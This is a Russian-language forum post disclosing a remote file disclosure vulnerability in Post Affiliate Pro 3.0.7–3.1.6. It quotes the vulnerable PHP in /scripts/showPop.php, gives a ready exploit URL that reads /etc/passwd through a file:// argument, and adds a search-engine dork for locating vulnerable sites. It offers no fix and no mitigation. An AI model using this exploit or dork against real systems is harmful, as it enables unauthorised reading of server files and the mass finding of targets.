Тема: Post Affiliate Pro
Показать сообщение отдельно
Старый 23.08.2010, 13:23   #1
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию Post Affiliate Pro

Продукт: Post Affiliate Pro 3.0.7 <= 3.1.6 Remote File Disclosure Vulnerability
Офф сайт: www.qualityunit.com
Зависимости: Нет
Уязвимые файлы: /scripts/showPop.php
Уязвимый кусок кода:

Файл /scripts/showPop.php:
PHP код:
if(isset($_REQUEST['special']) && $_REQUEST['special'] == '1')
{

    if(
$_REQUEST['banner_content'] == '' || $_REQUEST['impression_content'] == '' 
       
|| $_REQUEST['clickurl'] == '') return;

    
$ch curl_init();
    
curl_setopt($chCURLOPT_URL$_REQUEST['banner_content']);
    
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
    
curl_setopt($chCURLOPT_RETURNTRANSFER1);
    
$content curl_exec($ch);

. . . .

    echo 
$content;

?> 

Exploit:
http://localhost/affiliatepro/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image

Dork:
"Affiliate software by QualityUnit"
asddas вне форума   Ответить с цитированием